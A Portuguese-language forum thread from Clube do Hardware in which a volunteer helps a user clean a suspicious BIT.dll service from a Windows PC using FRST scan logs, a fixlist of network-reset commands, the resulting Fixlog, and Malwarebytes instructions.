2017-02-05 13:20 - 2012-11-09 09:41 - 00088064 _____ C:\Windows\system32\CNC176CD.TBL
2017-02-05 13:20 - 2012-11-08 12:04 - 00282624 _____ (CANON INC.) C:\Windows\system32\CNC_BWC.dll
2017-02-05 13:20 - 2012-11-08 12:03 - 00106496 _____ (CANON INC.) C:\Windows\system32\CNC_BWI.dll
2017-02-05 13:20 - 2008-08-25 17:02 - 00017920 _____ (CANON INC.) C:\Windows\system32\CNHMCA6.dll
2017-02-05 13:19 - 2017-02-05 13:20 - 00000000 ___HD C:\Program Files\CanonBJ
2017-02-05 13:19 - 2013-03-24 04:00 - 00391168 _____ (CANON INC.) C:\Windows\system32\CNMLMBW.DLL

==================== Três Meses Modificados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2017-05-06 16:03 - 2017-01-24 13:03 - 00004994 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for User-PC-User User-PC
2017-05-06 16:02 - 2009-07-14 01:45 - 00025216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-06 16:02 - 2009-07-14 01:45 - 00025216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-06 15:52 - 2017-01-24 09:39 - 00000000 __SHD C:\Users\User\IntelGraphicsProfiles
2017-05-06 15:51 - 2009-07-14 02:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-04 16:33 - 2017-01-24 10:12 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00158368 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-04 16:33 - 2017-01-24 10:12 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-04 16:32 - 2017-01-24 10:12 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-03 23:40 - 2009-07-14 14:55 - 00702882 _____ C:\Windows\system32\prfh0416.dat
2017-05-03 23:40 - 2009-07-14 14:55 - 00145668 _____ C:\Windows\system32\prfc0416.dat
2017-05-03 23:40 - 2009-07-14 02:13 - 01626900 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-03 23:40 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\inf
2017-05-03 23:26 - 2017-01-24 09:13 - 00001882 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-05-03 23:26 - 2017-01-24 09:13 - 00001687 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2017-05-03 13:18 - 2017-01-26 11:55 - 00002230 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-03 00:58 - 2017-01-24 10:57 - 00000000 ____D C:\Users\User\Downloads\FILMES
2017-05-01 17:11 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\system32\NDF
2017-04-27 17:14 - 2017-01-26 11:53 - 00003500 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-27 17:14 - 2017-01-26 11:53 - 00003372 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-25 12:23 - 2009-07-14 02:08 - 00032586 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-04-22 13:43 - 2017-01-24 10:02 - 00000000 ____D C:\Users\User\AppData\Local\Microsoft Help
2017-04-22 00:37 - 2017-01-24 11:19 - 00000000 ____D C:\Users\User\Downloads\MANGAS
2017-04-21 12:46 - 2009-07-14 00:20 - 00000000 __RHD C:\Users\Public\Libraries
2017-04-21 12:10 - 2009-07-14 02:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2017-04-19 13:37 - 2017-01-24 10:24 - 00000000 ____D C:\Users\User\Downloads\@ProjectDraw
2017-04-13 20:19 - 2017-01-24 09:32 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-13 20:18 - 2017-01-24 09:31 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-06 20:41 - 2017-01-24 11:17 - 00000000 ____D C:\Users\User\Downloads\JOGOS

==================== Arquivos na raiz de alguns diretórios =======

2017-02-22 13:43 - 2017-04-25 20:17 - 0000132 _____ () C:\Users\User\AppData\Roaming\Preferências do Formato PNG do Adobe CS6

Arquivos para serem movidos ou deletados:
====================
C:\Users\User\AppData\Local\background_fault\aswRD.exe


==================== Bamital & volsnap ======================

(Não há correção automática para arquivos que não passaram na verificação.)

C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

LastRegBack: 2017-05-03 12:52

==================== Fim de FRST.txt ============================

Addition.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

Acesse o VirusTotal no link abaixo e siga as instruções para analisar o arquivo:
http://www.virustotal.com/

  1. Antes selecione a opção Arquivo como mostra a imagem abaixo:
    2qvun9v.png
  2. Clique em Selecionar arquivo
  3. Copie o conteúdo do CODE abaixo:
    C:\ProgramData\BIT\BIT.dll
  4. Cole onde diz: Nome do arquivo: e clique em Abrir
  5. Clique em Analise!
  6. Se aparecer a mensagem que já foi analisado, clique em Reanalizar
  7. Aguarde a análise terminar, então copie e cole a URL/Link do site na sua próxima resposta.

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

 

Abra o seu Bloco de Notas, copie (control + c) e cole (control + v) todo o texto que está abaixo:

 

CreateRestorePoint:
CloseProcesses:
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Arquivo não assinado]
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\Users\Todos os Usuários\BIT
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\ProgramData\BIT
Task: {5E4FBFE5-839A-4EB9-965F-80BC23F66E2F} - \AutoPico Daily Restart -> Nenhum Arquivo <==== ATENÇÃO
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
StartMenuInternet: firefox.exe - firefox.exe
StartMenuInternet: Google Chrome - Chrome.exe
HOSTS:
RemoveProxy:
GroupPolicy: Restrição <======= ATENÇÃO
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: bitsadmin /reset /allusers
CMD: nbtstat -R
CMD: nbtstat -RR
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /flushdns
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh interface ip delete arpcache
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
  • Salve este arquivo na Área de Trabalho (Desktop) como fixlist.txt
  • Execute novamente o FRST e clique no botão Corrigir;
  • Aguarde... ao final será gerado o log Fixlog.txt em sua Área de Trabalho (Desktop).
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

 

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Turco

 

Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 14-05-2017
Executado por User (15-05-2017 16:22:31) Run:1
Executando a partir de C:\Users\User\Desktop
Perfis Carregados: User (Perfis Disponíveis: User)
Modo da Inicialização: Normal
==============================================

fixlist Conteúdo:
*****************
CreateRestorePoint:
CloseProcesses:
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Arquivo n�o assinado]
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\Users\Todos os Usu�rios\BIT
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\ProgramData\BIT
Task: {5E4FBFE5-839A-4EB9-965F-80BC23F66E2F} - \AutoPico Daily Restart -> Nenhum Arquivo <==== ATEN��O
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
StartMenuInternet: firefox.exe - firefox.exe
StartMenuInternet: Google Chrome - Chrome.exe
HOSTS:
RemoveProxy:
GroupPolicy: Restri��o <======= ATEN��O
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: bitsadmin /reset /allusers
CMD: nbtstat -R
CMD: nbtstat -RR
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /flushdns
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh interface ip delete arpcache
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
*****************

Ponto de Restauração criado com sucesso.
Processos fechados com sucesso.
BIT => serviço não encontrado (a).
C:\Users\Todos os Usuários\BIT => movido com sucesso
"C:\ProgramData\BIT" => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E4FBFE5-839A-4EB9-965F-80BC23F66E2F} => chave não encontrado (a). 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoPico Daily Restart => chave não encontrado (a). 
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valor restaurado com sucesso
HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command\\Default => valor restaurado com sucesso
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => valor restaurado com sucesso
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.


========= Fim de RemoveProxy: =========

"C:\Windows\system32\GroupPolicy\Machine" => não encontrado (a).

========= netsh advfirewall reset =========

Ok.


========= Fim de CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Ok.


========= Fim de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= Fim de CMD: =========


========= nbtstat -R =========

    Limpeza e pr‚-carregamento da Tabela de nomes de caches remotas NBT com 
    ˆxito.

========= Fim de CMD: =========


========= nbtstat -RR =========

    Os nomes NetBIOS registrados por este computador foram atualizados.


========= Fim de CMD: =========


========= netsh winsock reset catalog =========


Cat logo Winsock redefinido com ˆxito.
Reinicie o computador para concluir a redefini‡Æo.


========= Fim de CMD: =========


========= netsh int ip reset c:\resetlog.txt =========

Redefinindo Global, OK!
Redefinindo Interface, OK!
Reinicie o computador para concluir esta a‡Æo.


========= Fim de CMD: =========


========= ipconfig /flushdns =========


Configura‡Æo de IP do Windows

Libera‡Æo do Cache do DNS Resolver bem-sucedida.

========= Fim de CMD: =========


========= ipconfig /release =========


Configura‡Æo de IP do Windows


Adaptador Ethernet ConexÆo local:

   Sufixo DNS espec¡fico de conexÆo. . . . . . : home
   Endere‡o IPv6 . . . . . . . . . . . . . . . : 2804:431:d701:abac:cff:1307:fe7d:5912
   Endere‡o IPv6 . . . . . . . . . . . . . . . : fd9a:ca93:c921:1:cff:1307:fe7d:5912
   Endere‡o IPv6 Tempor rio. . . . . . . . . . : 2804:431:d701:abac:7904:3759:ed12:e70d
   Endere‡o IPv6 Tempor rio. . . . . . . . . . : fd9a:ca93:c921:1:7904:3759:ed12:e70d
   Endere‡o IPv6 de link local . . . . . . . . : fe80::cff:1307:fe7d:5912%12
   Gateway PadrÆo. . . . . . . . . . . . . . . : fe80::7618:65ff:fe08:b148%12

========= Fim de CMD: =========


========= ipconfig /renew =========


Configura‡Æo de IP do Windows


Adaptador Ethernet ConexÆo local:

   Sufixo DNS espec¡fico de conexÆo. . . . . . : home
   Endere‡o IPv6 . . . . . . . . . . . . . . . : 2804:431:d701:abac:cff:1307:fe7d:5912
   Endere‡o IPv6 . . . . . . . . . . . . . . . : fd9a:ca93:c921:1:cff:1307:fe7d:5912
   Endere‡o IPv6 Tempor rio. . . . . . . . . . : 2804:431:d701:abac:7904:3759:ed12:e70d
   Endere‡o IPv6 Tempor rio. . . . . . . . . . : fd9a:ca93:c921:1:7904:3759:ed12:e70d
   Endere‡o IPv6 de link local . . . . . . . . : fe80::cff:1307:fe7d:5912%12
   Endere‡o IPv4. . . . . . . .  . . . . . . . : 192.168.1.39
   M scara de Sub-rede . . . . . . . . . . . . : 255.255.255.0
   Gateway PadrÆo. . . . . . . . . . . . . . . : fe80::7618:65ff:fe08:b148%12
                                                 192.168.1.1

========= Fim de CMD: =========


========= netsh interface ip delete arpcache =========

Ok.


========= Fim de CMD: =========


========= netsh int ipv4 reset =========

Redefinindo Interface, OK!
Reinicie o computador para concluir esta a‡Æo.


========= Fim de CMD: =========


========= netsh int ipv6 reset =========

Redefinindo Interface, OK!
Reinicie o computador para concluir esta a‡Æo.


========= Fim de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9543292 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 1495551 B
Edge => 0 B
Chrome => 871790930 B
Firefox => 0 B
Opera => 26780832 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 8643309 B
systemprofile32 => 37444667 B
LocalService => 66228 B
NetworkService => 0 B
User => 39120648 B

RecycleBin => 12003981844 B
EmptyTemp: => 12.1 GB de dados temporários Removidos.

================================


O sistema precisou ser reiniciado.

==== Fim de Fixlog 16:24:20 ====

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

Baixe a Malwarebytes Anti-Malware (MBAM).
 
Clique duas vezes no mbam-setup.exe para instalar o programa.

  • Desmarque a caixa Ativar trial gratuito do MalwareBytes Anti-Malware PRO.
  • Se houver atualizações a serem feitas, serão baixadas e instaladas..
  • Clique em Configurações, clique em Detecção e proteção, marque Verificar por Rootkits.
  • Volte ao Painel e por fim clique em Verificar agora.
  • Começará então o exame. Aguarde, pois pode demorar.
  • Ao acabar o exame, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecionadas
  • Ao final da desinfecção, poderá aparecer um aviso se quer reiniciar o PC. (Ver Nota abaixo)
  • O log é automaticamente salvo pelo MBAM e para vê-lo, clique na aba Histórico -> Registros do aplicativo na janela principal do programa.
  • Clique duas vezes no log (Registro de verificação). Utilize o formato .txt para exportar o log.
  • O log de Proteção é desnecessário para a análise, exporte sempre o log correto.
  • Selecione, copie e cole o conteúdo deste log em sua próxima resposta.

 

NOTA: Se o MBAM encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC (talvez mais de uma vez). Faça isso imediatamente, ao ser perguntado se quer reiniciar o PC.

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 2017-5-15 às 19:41, Turco disse:

Desmarque a caixa Ativar trial gratuito do MalwareBytes Anti-Malware P

 

essa opção não apareceu, tentei reinstalar e nada...@Turco

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 2017-5-15 às 19:41, Turco disse:

Desmarque a caixa Ativar trial gratuito do MalwareBytes Anti-Malwar

 não aparece a opção de desmarcar ...

 

Em 2017-5-15 às 19:41, Turco disse:

Ao acabar o exame, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecio

Tambem não aparece a opção de REMOVER SELECIONADOS (anexo)

opçao nao aparece.png

Compartilhar este post


Link para o post
Compartilhar em outros sites
Citação

Tambem não aparece a opção de REMOVER SELECIONADOS (anexo)

 

Teve uma mudança na interface, só clicar no botão "Colocar em Quarentena".

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tópico Arquivado

 

Como o autor não respondeu ao tópico por mais de 10 dias, o mesmo foi arquivado. Caso você seja o autor do tópico e quer que o mesmo seja reaberto, entre em contato com um Analista de Segurança solicitando o desbloqueio.

 

Turco

diego_moicano

 

 

Compartilhar este post


Link para o post
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×